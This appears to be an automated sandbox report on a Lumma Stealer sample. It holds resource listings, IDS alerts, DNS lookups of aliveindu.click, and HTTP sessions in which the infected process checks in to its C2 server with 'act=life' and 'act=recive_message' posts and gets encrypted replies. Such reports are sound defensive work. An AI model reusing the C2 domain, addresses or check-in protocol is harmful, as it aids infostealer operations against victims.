RT_STRING | 0x6ce708 | 0x264 | data | | | 0.49019607843137253
RT_STRING | 0x6ce96c | 0x4e0 | data | | | 0.31971153846153844
RT_STRING | 0x6cee4c | 0x368 | data | | | 0.44036697247706424
RT_STRING | 0x6cf1b4 | 0x340 | data | | | 0.4014423076923077
RT_RCDATA | 0x6cf4f4 | 0x10 | data | | | 1.5
RT_RCDATA | 0x6cf504 | 0x990 | data | | | 0.5441176470588235
RT_RCDATA | 0x6cfe94 | 0x1fe2 | Delphi compiled form 'TForm1' | | | 0.43616760597892673
RT_RCDATA | 0x6d1e78 | 0x37c | Delphi compiled form 'TForm14' | | | 0.5627802690582959
RT_RCDATA | 0x6d21f4 | 0x4d6 | Delphi compiled form 'TForm2' | | | 0.48384491114701134
RT_RCDATA | 0x6d26cc | 0x919c | Delphi compiled form 'TInfoForm' | | | 0.10057409593304002
RT_GROUP_CURSOR | 0x6db868 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x6db87c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x6db890 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db8a4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db8b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db8cc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db8e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db8f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x6db908 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x6db91c | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x6db930 | 0x14 | data | | | 1.25
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T18:47:00.926245+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:01.412207+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:01.412207+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.071916+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.547746+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.547746+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:03.207695+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50015 | 104.21.64.143 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 18:47:00.450478077 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.450499058 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:00.454814911 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.457487106 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.457495928 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:00.926131010 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:00.926244974 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.927896023 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.927901983 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:00.928124905 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:00.971282005 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.971282005 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:00.971405029 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.412210941 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.412309885 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.412444115 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.418636084 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.418637037 CET | 50013 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.418673038 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.418698072 CET | 443 | 50013 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.445398092 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.445429087 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:01.445507050 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.445836067 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:01.445849895 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.071842909 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.071916103 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.073854923 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.073865891 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.074112892 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.075711966 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.075743914 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.075788975 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547751904 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547797918 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547825098 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547858000 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547864914 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.547878981 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547889948 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.547897100 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.547960997 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.548109055 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.548425913 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.548453093 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.548495054 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.548510075 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.548556089 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.552361012 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.552470922 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.552495956 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.552525997 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.552536964 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.554822922 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.635982990 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.636061907 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.636122942 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.636149883 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.636171103 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.636224985 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.637018919 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.637034893 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.637048960 CET | 50014 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.637057066 CET | 443 | 50014 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.737618923 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.737713099 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:02.737845898 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.738073111 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:02.738097906 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:03.207617044 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:03.207695007 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:03.209152937 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:03.209161043 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:03.209372044 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:03.210596085 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:03.210741997 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:03.210762024 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Dec 30, 2024 18:47:03.210824966 CET | 50015 | 443 | 192.168.2.4 | 104.21.64.143
Dec 30, 2024 18:47:03.210835934 CET | 443 | 50015 | 104.21.64.143 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 18:47:00.434233904 CET | 61889 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 18:47:00.445626974 CET | 53 | 61889 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 18:47:00.434233904 CET | 192.168.2.4 | 1.1.1.1 | 0x59ab | Standard query (0) | aliveindu.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 18:47:00.445626974 CET | 1.1.1.1 | 192.168.2.4 | 0x59ab | No error (0) | aliveindu.click | | 104.21.64.143 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:47:00.445626974 CET | 1.1.1.1 | 192.168.2.4 | 0x59ab | No error (0) | aliveindu.click | | 172.67.151.146 | A (IP address) | IN (0x0001) | false
• aliveindu.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | 7012 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:47:00 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: aliveindu.click
2024-12-30 17:47:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-30 17:47:01 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:47:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5ggenpqli3n298j1h6rl4b0hd4; expires=Fri, 25 Apr 2025 11:33:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIpLydApfNnB73d9H9UJL01m6Bq5CO2%2F4Ttvu%2BNcIjs9RqHh8sCVs08UTxXMwISu7abCKeKMUrXjFsilkJGA9B%2FVXF2ImMvyItlBXYf%2BD%2B2He77Juuyf0EhjXSLbgQ6QEuA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3da436b2e0f8b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1698&rtt_var=646&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1680092&cwnd=237&unsent_bytes=0&cid=06d9361084184489&ts=496&x=0"
2024-12-30 17:47:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-30 17:47:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | 7012 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:47:02 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 46
Host: aliveindu.click
2024-12-30 17:47:02 UTC | 46 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 46 63 47 68 36 2d 2d 32 39 31 32 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=bFcGh6--2912&j=
2024-12-30 17:47:02 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:47:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3s536105slej2q2tsa23g51lfn; expires=Fri, 25 Apr 2025 11:33:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6GXG0OsyOTPN%2FZp8sHh2qJ70pgTnO4hAjtlDFO8179ZmHoLBnm7%2Fh%2FFIgpNEjSRcsh2r7tNjTXOUduRuos4Qc%2BCbDwdsLi21SfiIPXa4OMNfdmGQRFp8G67mS0RpIGBg0Mo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3da4a8867c35d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=59481&min_rtt=1594&rtt_var=34884&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=945&delivery_rate=1831869&cwnd=183&unsent_bytes=0&cid=64d2381820c6f91c&ts=483&x=0"
2024-12-30 17:47:02 UTC | 241 | IN | Data Raw: 31 63 61 36 0d 0a 73 4f 65 35 59 76 52 6e 62 50 48 55 55 58 4c 61 6a 6b 39 31 34 37 4c 61 64 37 71 62 62 73 65 45 77 42 4d 4b 47 52 45 69 71 49 4c 4c 78 63 39 41 7a 6c 4e 41 30 36 63 30 55 4f 44 36 50 51 43 47 6e 76 67 57 33 72 6c 55 6f 65 57 73 59 47 38 31 4d 31 54 46 6f 49 71 42 32 41 36 48 41 6b 44 54 73 53 6c 51 34 4e 55 30 56 34 62 63 2b 45 32 59 2f 67 53 6c 35 61 78 78 61 33 4a 2b 55 73 54 68 32 49 76 65 43 70 45 45 43 4a 43 34 50 42 65 2f 36 79 34 66 6a 64 75 33 48 39 65 35 51 75 58 68 75 6a 45 77 4f 31 78 48 33 4f 50 39 68 73 6f 4a 31 68 70 41 69 76 59 30 48 50 69 30 62 52 53 47 30 4c 59 52 33 76 41 47 72 2b 79 6b 63 47 35 7a 59 55 76 4f 36 74 69 46 33 51 75 62 44 52 79 64 73 6a 73 63 75 65 45 75 56 38 2b
Data Ascii: 1ca6sOe5YvRnbPHUUXLajk9147Lad7qbbseEwBMKGREiqILLxc9AzlNA06c0UOD6PQCGnvgW3rlUoeWsYG81M1TFoIqB2A6HAkDTsSlQ4NU0V4bc+E2Y/gSl5axxa3J+UsTh2IveCpEECJC4PBe/6y4fjdu3H9e5QuXhujEwO1xH3OP9hsoJ1hpAivY0HPi0bRSG0LYR3vAGr+ykcG5zYUvO6tiF3QubDRydsjscueEuV8+
2024-12-30 17:47:02 UTC | 1369 | IN | Data Raw: 51 76 77 32 59 6f 55 7a 32 31 4b 46 67 65 57 35 2b 55 4d 79 67 7a 63 76 43 51 4a 45 4a 54 73 76 32 4f 78 79 32 36 53 34 59 68 74 47 34 42 39 66 35 44 36 33 75 70 6e 74 6e 64 48 78 4f 77 4f 66 61 6a 4e 77 50 6b 51 30 49 6e 4c 56 7a 58 76 6a 72 4e 56 66 5a 6b 4a 67 46 32 2f 6f 59 71 50 66 69 62 69 5a 69 4d 30 66 47 6f 49 72 46 33 51 36 58 43 41 36 42 76 6a 67 62 76 66 34 6d 48 6f 7a 64 75 42 6a 53 39 67 2b 6c 34 61 68 37 5a 33 46 33 54 63 66 6d 30 6f 57 62 54 74 59 43 46 74 50 75 63 7a 4f 39 2f 43 6f 62 6c 35 4b 43 56 63 65 33 46 65 58 68 72 6a 45 77 4f 33 74 46 79 65 50 5a 69 74 67 49 6e 52 63 4f 67 62 41 2b 46 61 72 71 4b 42 6d 4c 30 36 6f 66 31 76 38 50 72 4f 32 72 64 47 39 2f 4d 77 36 4b 35 38 72 46 67 30 43 33 43 41 57 66 76 43 51 51 2b 50 4e 6a 44 73
Data Ascii: Qvw2YoUz21KFgeW5+UMygzcvCQJEJTsv2Oxy26S4YhtG4B9f5D63upntndHxOwOfajNwPkQ0InLVzXvjrNVfZkJgF2/oYqPfibiZiM0fGoIrF3Q6XCA6Bvjgbvf4mHozduBjS9g+l4ah7Z3F3Tcfm0oWbTtYCFtPuczO9/Cobl5KCVce3FeXhrjEwO3tFyePZitgInRcOgbA+FarqKBmL06of1v8PrO2rdG9/Mw6K58rFg0C3CAWfvCQQ+PNjDs
2024-12-30 17:47:02 UTC | 1369 | IN | Data Raw: 30 76 38 44 71 4f 72 69 50 79 68 38 61 77 43 53 6f 50 69 47 7a 77 4f 63 52 7a 75 51 75 44 30 58 72 71 77 79 57 5a 69 51 76 78 6d 59 6f 55 79 6f 35 36 70 33 65 6e 52 2b 51 38 54 75 33 59 44 55 43 4a 59 46 41 35 61 79 4f 42 75 37 34 53 6b 46 69 39 43 77 45 4e 6e 7a 42 75 57 6f 34 6e 5a 77 4f 79 73 41 2b 2f 66 5a 78 2b 34 44 6d 41 73 4a 68 66 59 73 58 71 47 73 4b 68 76 42 69 50 67 59 30 50 77 4a 71 75 65 6f 66 32 31 78 66 30 6a 45 34 38 43 4b 33 77 43 61 44 51 53 65 75 44 63 59 73 65 63 6d 45 59 48 52 73 6c 57 57 75 51 75 39 70 76 6f 78 58 48 78 2f 54 63 57 69 35 34 62 56 44 70 45 54 54 6f 7a 34 4b 6c 43 2f 34 47 31 50 77 64 79 78 46 64 50 7a 43 4b 58 68 72 33 52 72 66 48 42 4e 7a 65 72 63 67 74 38 4d 6e 77 67 49 6b 37 45 33 46 61 72 70 4a 42 75 4e 6b 50 5a
Data Ascii: 0v8DqOriPyh8awCSoPiGzwOcRzuQuD0XrqwyWZiQvxmYoUyo56p3enR+Q8Tu3YDUCJYFA5ayOBu74SkFi9CwENnzBuWo4nZwOysA+/fZx+4DmAsJhfYsXqGsKhvBiPgY0PwJqueof21xf0jE48CK3wCaDQSeuDcYsecmEYHRslWWuQu9pvoxXHx/TcWi54bVDpETToz4KlC/4G1PwdyxFdPzCKXhr3RrfHBNzercgt8MnwgIk7E3FarpJBuNkPZ
2024-12-30 17:47:02 UTC | 1369 | IN | Data Raw: 2b 76 2f 34 6e 5a 6b 4f 79 73 41 77 2b 6e 41 69 39 55 4a 6d 77 4d 47 6c 4c 67 2b 47 37 37 6e 4b 68 43 48 33 62 41 59 33 66 6f 4e 6f 65 79 77 63 6d 4e 78 66 6b 71 4b 72 70 4b 43 77 30 44 4f 52 53 6d 66 6e 79 4d 4c 71 76 70 74 43 4d 2f 4a 2b 42 4c 55 75 56 54 6c 35 61 31 34 5a 33 4e 37 54 38 58 6b 33 49 50 64 44 5a 4d 4b 42 49 47 2b 50 52 32 7a 34 79 59 46 67 64 32 38 47 64 7a 78 42 36 2b 6d 37 44 46 76 59 7a 4d 59 69 74 58 66 69 74 73 44 67 45 55 52 33 61 39 7a 46 37 53 73 64 56 65 4e 33 72 67 61 31 50 55 48 72 65 65 75 66 32 39 2b 65 6b 6a 43 38 74 4f 42 30 77 47 59 43 67 2b 58 73 7a 59 55 76 2b 67 72 47 4d 47 65 2b 42 4c 41 75 56 54 6c 79 59 56 45 4b 6c 70 4a 41 4e 57 75 79 38 58 63 44 4e 5a 64 54 70 2b 31 50 78 69 33 36 69 51 62 69 39 6d 7a 47 64 50 39
Data Ascii: +v/4nZkOysAw+nAi9UJmwMGlLg+G77nKhCH3bAY3foNoeywcmNxfkqKrpKCw0DORSmfnyMLqvptCM/J+BLUuVTl5a14Z3N7T8Xk3IPdDZMKBIG+PR2z4yYFgd28GdzxB6+m7DFvYzMYitXfitsDgEUR3a9zF7SsdVeN3rga1PUHreeuf29+ekjC8tOB0wGYCg+XszYUv+grGMGe+BLAuVTlyYVEKlpJANWuy8XcDNZdTp+1Pxi36iQbi9mzGdP9
2024-12-30 17:47:02 UTC | 1369 | IN | Data Raw: 64 2b 61 58 70 31 55 73 33 70 77 49 76 57 44 35 34 4e 42 35 4b 79 4e 68 32 2b 34 43 63 57 68 74 36 32 48 5a 69 33 54 4b 4c 2b 34 69 6b 6f 57 6d 4e 62 32 50 62 66 70 4e 59 50 31 68 70 41 69 76 59 30 48 50 69 30 62 52 36 54 31 4c 55 48 30 66 34 43 71 75 57 77 63 47 56 77 59 55 66 46 35 4e 57 4a 33 51 2b 51 42 41 75 5a 75 6a 51 56 73 2b 4d 68 56 38 2b 51 76 77 32 59 6f 55 79 4c 37 62 46 6d 61 33 56 34 56 74 47 67 7a 63 76 43 51 4a 45 4a 54 73 76 32 4d 42 75 7a 36 43 30 62 67 64 53 31 46 63 72 32 43 36 4c 76 71 57 4e 69 66 48 52 4c 77 75 76 64 67 38 6b 4d 6d 42 63 4c 67 61 52 7a 58 76 6a 72 4e 56 66 5a 6b 49 34 53 79 4f 6b 50 35 39 65 30 63 6e 35 77 66 6b 79 4b 2f 35 79 63 6d 77 65 61 52 56 62 54 73 44 77 5a 75 2b 4d 73 48 6f 33 64 76 52 7a 64 2b 41 71 68 37
                                                                                                        Data Ascii: d+aXp1Us3pwIvWD54NB5KyNh2+4CcWht62HZi3TKL+4ikoWmNb2PbfpNYP1hpAivY0HPi0bR6T1LUH0f4CquWwcGVwYUfF5NWJ3Q+QBAuZujQVs+MhV8+Qvw2YoUyL7bFma3V4VtGgzcvCQJEJTsv2MBuz6C0bgdS1Fcr2C6LvqWNifHRLwuvdg8kMmBcLgaRzXvjrNVfZkI4SyOkP59e0cn5wfkyK/5ycmweaRVbTsDwZu+MsHo3dvRzd+Aqh7
                                                                                                        2024-12-30 17:47:02 UTC1369INData Raw: 67 4d 31 2b 45 2b 5a 4b 43 31 30 44 4f 52 51 32 55 74 54 49 61 73 65 41 69 45 49 58 43 73 68 4c 4b 2b 41 32 75 36 36 35 78 5a 58 5a 35 51 63 50 74 33 6f 6a 63 42 35 6b 41 54 74 33 32 4e 41 6a 34 74 47 30 32 6a 4e 75 30 54 6f 4b 35 45 2b 76 2f 34 6e 5a 6b 4f 79 73 41 79 75 72 58 6a 39 59 44 6d 51 59 63 6b 72 41 68 45 4c 58 6d 50 78 32 4b 31 62 55 59 31 66 6f 4b 6f 2b 32 75 59 32 46 37 63 45 75 4b 72 70 4b 43 77 30 44 4f 52 53 32 45 6f 44 6b 58 74 50 6f 6d 46 6f 4c 47 74 51 57 59 74 30 79 30 34 62 4d 78 4d 47 31 6a 56 38 33 2f 6e 4a 79 62 42 35 70 46 56 74 4f 77 4f 68 61 2f 36 69 4d 46 68 4e 61 33 47 74 48 77 43 4b 33 6c 6f 6e 56 73 66 48 5a 44 78 75 76 56 68 74 51 45 6e 77 73 48 6e 50 5a 39 55 4c 2f 30 62 55 2f 42 38 61 4d 57 31 50 52 4d 75 71 69 37 4d 57
                                                                                                        Data Ascii: gM1+E+ZKC10DORQ2UtTIaseAiEIXCshLK+A2u665xZXZ5QcPt3ojcB5kATt32NAj4tG02jNu0ToK5E+v/4nZkOysAyurXj9YDmQYckrAhELXmPx2K1bUY1foKo+2uY2F7cEuKrpKCw0DORS2EoDkXtPomFoLGtQWYt0y04bMxMG1jV83/nJybB5pFVtOwOha/6iMFhNa3GtHwCK3lonVsfHZDxuvVhtQEnwsHnPZ9UL/0bU/B8aMW1PRMuqi7MW
                                                                                                        2024-12-30 17:47:02 UTC256INData Raw: 30 71 43 4b 78 66 73 4c 67 41 41 4a 68 66 51 47 45 37 62 69 4b 67 48 42 7a 34 64 62 6d 50 59 57 35 62 36 62 61 43 68 38 66 77 43 53 6f 4d 65 43 32 77 65 4d 45 77 6d 66 70 7a 67 64 74 4d 34 69 45 4a 66 54 74 78 62 4a 38 45 43 75 36 2b 49 2f 4b 48 78 72 41 4a 4b 67 2f 59 4c 4e 41 37 6b 47 48 35 72 32 66 56 43 2f 2b 6d 31 50 77 65 37 34 42 39 76 70 44 36 72 33 6e 44 45 77 59 6b 30 41 77 66 62 56 6c 64 67 57 6e 51 67 43 67 6f 68 7a 53 4f 79 2b 66 30 58 54 67 71 64 56 78 38 5a 43 35 65 66 69 4b 56 46 69 4d 31 61 4b 75 49 44 4c 6d 78 4c 57 58 55 37 55 74 53 45 43 76 75 38 37 46 4d 62 75 68 6a 4c 4f 38 77 75 31 34 62 56 2b 4b 44 55 7a 54 34 71 34 36 38 58 53 42 34 30 55 47 4a 36 6d 4e 46 43 48 6f 6d 30 50 77 59 6a 34 49 4e 76 33 41 71 4c 77 73 7a 78 50 62 58 0d
                                                                                                        Data Ascii: 0qCKxfsLgAAJhfQGE7biKgHBz4dbmPYW5b6baCh8fwCSoMeC2weMEwmfpzgdtM4iEJfTtxbJ8ECu6+I/KHxrAJKg/YLNA7kGH5r2fVC/+m1Pwe74B9vpD6r3nDEwYk0AwfbVldgWnQgCgohzSOy+f0XTgqdVx8ZC5efiKVFiM1aKuIDLmxLWXU7UtSECvu87FMbuhjLO8wu14bV+KDUzT4q468XSB40UGJ6mNFCHom0PwYj4INv3AqLwszxPbX
